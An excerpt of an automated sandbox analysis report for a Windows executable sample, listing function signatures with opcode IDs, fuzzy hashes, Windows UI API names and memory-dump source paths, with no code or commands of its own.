                                                                            • Instruction ID: 18886d3435660d26a6b580c184176ab9efb47b3b4c27c6951c70a94ff953b865
                                                                            • Opcode Fuzzy Hash: 66932146c9bcaa270c68ee22a56249e68f246334e80308474ed53cdf21c3bb25
                                                                            • Instruction Fuzzy Hash: A1C1BE35701A4182EB5ADB27E5983ED2371FB9CBC4F184226EB194B7B5DF78C4928B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: 8f71e8f78ce42dfa13f8ae3b3d6ce8de3eb54376600b7248d849b8755048b882
                                                                            • Instruction ID: c7d56def2553da81f5fc827971cbd67b98ee5046f83e9ce0986deff8743221f9
                                                                            • Opcode Fuzzy Hash: 8f71e8f78ce42dfa13f8ae3b3d6ce8de3eb54376600b7248d849b8755048b882
                                                                            • Instruction Fuzzy Hash: 7291E4727256D085FB22DB22D6603ED76A4BB68FE4F188219DF6547BE5DB34C842E300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3879113052-0
                                                                            • Opcode ID: c2f11528365bc0e702ac84aeeef73be496c3e8d064ed229e3c2cc5eb29e22396
                                                                            • Instruction ID: e4e9a459d3df3f4822e0ff4f50f5573a34efb806104c9f3ef630835967af2b5e
                                                                            • Opcode Fuzzy Hash: c2f11528365bc0e702ac84aeeef73be496c3e8d064ed229e3c2cc5eb29e22396
                                                                            • Instruction Fuzzy Hash: E6617936710A508AEB15DFA7D450BED67A1FB8CB88F054026EF0E57BA4DE79D442C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 839f492d6d34be0e97546e08670404adf7f165091affd25df6efa605ed8995da
                                                                            • Instruction ID: 87e446806d77016ca0573bf57eee48dabd9c597938ba2b99769cdf82cbe8bf2e
                                                                            • Opcode Fuzzy Hash: 839f492d6d34be0e97546e08670404adf7f165091affd25df6efa605ed8995da
                                                                            • Instruction Fuzzy Hash: 1A516C76210A8092EB568F27E8547DA6321F788FD4F169222EF5D0BBB8DE34C502C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientMessageScreenSendWindow
                                                                            • String ID:
                                                                            • API String ID: 2093367132-0
                                                                            • Opcode ID: e7d5d7832fce23f00eeb5f21d1acf8394db4bff88555591e5572bfbc5ed895d9
                                                                            • Instruction ID: 2bbcd081a791a5380f7d53db871c380c63968c99e8fb4d7ecbb8cdbc9e50c91f
                                                                            • Opcode Fuzzy Hash: e7d5d7832fce23f00eeb5f21d1acf8394db4bff88555591e5572bfbc5ed895d9
                                                                            • Instruction Fuzzy Hash: 84513D75A0860081FBAABB33D4843EE26A0F78CBC4F540426FB47876F5DA7DC890CA41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMaskWindow$BackgroundClientDrawFillInfoMetricsParentPointsSystemThemeVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 3218022401-0
                                                                            • Opcode ID: 3b25bf4e41cef08f91dce310206dc6ea695ab5483460a4003c1d595307dba382
                                                                            • Instruction ID: 19f4eb0740e7b7fcbb170bad8778599c69f22006de7534927e7437aeee62f64d
                                                                            • Opcode Fuzzy Hash: 3b25bf4e41cef08f91dce310206dc6ea695ab5483460a4003c1d595307dba382
                                                                            • Instruction Fuzzy Hash: B851AE36605A8086EB16DF23E854BAE67A0FB8CBC4F059021FF4A47BA0EF78C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Text$ItemLengthLong
                                                                            • String ID:
                                                                            • API String ID: 538016872-0
                                                                            • Opcode ID: 12e4cd8df65f45c7c7f48a9676cbd89acf03eff6fbe613e40f7bac8e025f4fae
                                                                            • Instruction ID: 30bfd975ea69eb28d482e1de3ff25fae77e5e7990cf4177de3eff9bceadb3cd0
                                                                            • Opcode Fuzzy Hash: 12e4cd8df65f45c7c7f48a9676cbd89acf03eff6fbe613e40f7bac8e025f4fae
                                                                            • Instruction Fuzzy Hash: 34517936714A8082EB229F27E5857AF7761E78CBE4F148221FB69477E6CF38C8518740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Parent$FocusMessageSendUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2438739141-0
                                                                            • Opcode ID: 4f1bd0ed8293b001d60c75b72ce99f6271484644d00ddc34160ed3d623aa0448
                                                                            • Instruction ID: 5306266ed95f3a3d8e8877018fc3e3ca4a2c538d002a2e258a5ca4b5a55ba708
                                                                            • Opcode Fuzzy Hash: 4f1bd0ed8293b001d60c75b72ce99f6271484644d00ddc34160ed3d623aa0448
                                                                            • Instruction Fuzzy Hash: 5C51AC35205B8182FE26EB67E4943EA23A0AB8DBE0F184125FB9A477F5DE7DC4418340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$Item$Enable$CheckCountState
                                                                            • String ID:
                                                                            • API String ID: 1442426176-0
                                                                            • Opcode ID: 9190c680a120d7d633a922c8599e2881aa82430fe02b2aa40675fdb0d0433749
                                                                            • Instruction ID: a2ae7b46029b9a60efb080a5cb77d337e45087f66b4751f84b97240e93c1710e
                                                                            • Opcode Fuzzy Hash: 9190c680a120d7d633a922c8599e2881aa82430fe02b2aa40675fdb0d0433749
                                                                            • Instruction Fuzzy Hash: 1631A23A700B4081E756AB63D45939A2BA1FB8DFD0F184525DF994B7F5DF79C4428700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSendState$ItemNextParent
                                                                            • String ID:
                                                                            • API String ID: 1930099164-0
                                                                            • Opcode ID: eb810cc5d1583be9c866a6dd4ff852e74709a8fc01d94d6a5bb29f331829081d
                                                                            • Instruction ID: ca0237629af525c576eebf6b92c50bbe9943adab76d20fb6cd65c4df9ed60a3c
                                                                            • Opcode Fuzzy Hash: eb810cc5d1583be9c866a6dd4ff852e74709a8fc01d94d6a5bb29f331829081d
                                                                            • Instruction Fuzzy Hash: 9C316F35281A4282FE669B17E8547EB2362EB8CBD4F140525EB5F0B7F0EF78C4418A40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$ContextExternal$BaseBase::~Concurrency::details::
                                                                            • String ID:
                                                                            • API String ID: 90368001-0
                                                                            • Opcode ID: f1a0382aba91b18763cfa8e740c47a32856f2fed497b1c64dafc1082f5532dc2
                                                                            • Instruction ID: c726d73ec35fa7949b87bd4cf0595aa691b8a3394e52e36824e497b838406b5e
                                                                            • Opcode Fuzzy Hash: f1a0382aba91b18763cfa8e740c47a32856f2fed497b1c64dafc1082f5532dc2
                                                                            • Instruction Fuzzy Hash: 83319E36224AC093EB669B22E855BDA7760FBCDB90F404225EB9D47BA5DF78C514CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$InvalidateParentRectUpdate$CaptureDestroyMessageReleaseSend
                                                                            • String ID:
                                                                            • API String ID: 1969771063-0
                                                                            • Opcode ID: 30aa3b8aadeae635dbfc8a7d3a3334473b168250d9390e2a253fac4c006d257f
                                                                            • Instruction ID: 775c5d53d389d6c0fb6d693e1a8698fb1f8f3c81fdf125ad0c9daf954497ae5f
                                                                            • Opcode Fuzzy Hash: 30aa3b8aadeae635dbfc8a7d3a3334473b168250d9390e2a253fac4c006d257f
                                                                            • Instruction Fuzzy Hash: B3213A76710681E7EB599F62DA94BE97762F7C8B85F440026CB1A07B61CF3AD4B0C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$Long$MessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2643385981-0
                                                                            • Opcode ID: 9be154b03619212b0101dc621ff628cb22f994f2980200fbea50d4c0a354a538
                                                                            • Instruction ID: ac51827701fd764177be95318d6162b630328ebe65fa6a58b1a862b2b79c425b
                                                                            • Opcode Fuzzy Hash: 9be154b03619212b0101dc621ff628cb22f994f2980200fbea50d4c0a354a538
                                                                            • Instruction Fuzzy Hash: D1115B35304A8082EB159B77A84979A2B61EBCDFD4F240125EF5A4BBAADF79C4428340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: InvalidateRectUpdateWindow$MessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2428145105-0
                                                                            • Opcode ID: 16a7b4430fedf1a7eb0ead75f6cfd763863962ee087d9f2a813d83afff1984eb
                                                                            • Instruction ID: 2f1c8e14cecacba3216c2dfa6d13e30769fc3df09f2dc4393c6dfd873a4cf139
                                                                            • Opcode Fuzzy Hash: 16a7b4430fedf1a7eb0ead75f6cfd763863962ee087d9f2a813d83afff1984eb
                                                                            • Instruction Fuzzy Hash: 5B11C676210A40CAFB569F22D4597D92762E788F4DF480036CF494B6A5DFBAC494CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileTemp$CloseCreateHandleNamePath
                                                                            • String ID: AFX
                                                                            • API String ID: 777972874-1300893600
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMask$BeginClientFillFocusInflateInfoMetricsPaintSystemVerifyVersion
                                                                            • String ID: mmm
                                                                            • API String ID: 3577466532-1545505134
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ClientScreen$Copy_invalid_parameter_noinfo
                                                                            • String ID: Afx:ControlBar
                                                                            • API String ID: 3927728238-4244778371
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$SendWindow$BeepEnableMenuRect
                                                                            • String ID: Can't create context menu!
                                                                            • API String ID: 1562889814-1189624947
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Edit
                                                                            • API String ID: 0-554135844
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 1632408287-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Window$Intersect$EqualOffset
                                                                            • String ID:
                                                                            • API String ID: 1272538121-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Copy$Window
                                                                            • String ID:
                                                                            • API String ID: 1774135527-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ColorRect$ClientInflateMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1205032120-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientCountInflateTick
                                                                            • String ID:
                                                                            • API String ID: 2651408654-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Empty$BackgroundDrawTheme$CreateIndirectInflateIntersect
                                                                            • String ID:
                                                                            • API String ID: 3293656562-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$DeferRect$BeginEqualExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 2064151242-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: RectWindow$InvalidateRedraw$CursorEventMouseOffsetTrackUpdate
                                                                            • String ID:
                                                                            • API String ID: 359670716-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: CursorLoad$Create
                                                                            • String ID:
                                                                            • API String ID: 1516763891-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
                                                                            • String ID:
                                                                            • API String ID: 2931574886-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$CursorEmptyMessagePostWindow
                                                                            • String ID:
                                                                            • API String ID: 1800939087-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ClientRect$Screen
                                                                            • String ID:
                                                                            • API String ID: 3187875807-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyScreen$EqualOffsetUnionWindow
                                                                            • String ID:
                                                                            • API String ID: 2676815302-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$AllocCreateEnterExceptionLeaveLockStreamThrow
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$wcschr
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Cursor$ConditionMask$ClientInfoLoadMetricsRectScreenSystemVerifyVersion
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Cursor$CaptureLoad
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$DesktopLongShow
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Parent$MessagePost
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$CapturePost$PeekRelease
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Global$LockUnlock$Create
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$DeleteGdiplusLeaveObjectShutdown
                                                                            • String ID:
                                                                            • API String ID: 1513102227-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l
                                                                            • String ID: %TsDockingManager-%d$DockingManagers$DockingPaneAndPaneDividers
                                                                            • API String ID: 2941638530-3268659044
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                            • API String ID: 3215553584-1196891531
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: Recursive entity definition for: $gfffffff
                                                                            • API String ID: 3668304517-697489208
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2525500382-1939653111
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ConditionMask$EllipseInflateInfoMetricsRectSystemVerifyVersion
                                                                            • String ID: Gu,$mmm
                                                                            • API String ID: 1790378709-3474039531
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: swprintf
                                                                            • String ID: - $:%d
                                                                            • API String ID: 233258989-2359489159
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FormatFreeLocalMessage
                                                                            • String ID: : $System error : 0x
                                                                            • API String ID: 1427518018-205398988
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetFileTitleW
                                                                            • API String ID: 2188249819-1191607377
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: InitCommonControlsEx
                                                                            • API String ID: 2188249819-2357626986
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetOpenFileNameW
                                                                            • API String ID: 2188249819-1384924626
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetSaveFileNameW
                                                                            • API String ID: 2188249819-611885661
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 0000000140036581
                                                                            Similarity
                                                                            • API ID: ActivateDebugErrorLastOutputString
                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                            • API String ID: 2396347390-2690750368
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$Fill
                                                                            • String ID:
                                                                            • API String ID: 309753019-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Text$ColorExtentPoint32
                                                                            • String ID:
                                                                            • API String ID: 3889842664-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 2270935405-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$ClientMetricsSystem$CopyEnableExceptionOffsetThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 4014177440-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 2961551908-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$EmptyParentRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3364553503-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Global$lstrcmp$ExceptionFlagsFreeLockThrowUnlock
                                                                            • String ID:
                                                                            • API String ID: 3532356804-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: EnableRectScroll$ClientInflateInfoMetricsSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 3090651611-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$InvalidateRectUpdate
                                                                            • String ID:
                                                                            • API String ID: 1651931182-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Object$Delete
                                                                            • String ID:
                                                                            • API String ID: 774837909-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                            • String ID:
                                                                            • API String ID: 72036449-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ExceptionOffsetThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 4150091248-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$Release
                                                                            • String ID:
                                                                            • API String ID: 1381443029-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Object$Move$OffsetRectSelect
                                                                            • String ID:
                                                                            • API String ID: 3256611858-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$EnableParentShow
                                                                            • String ID:
                                                                            • API String ID: 2218845466-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
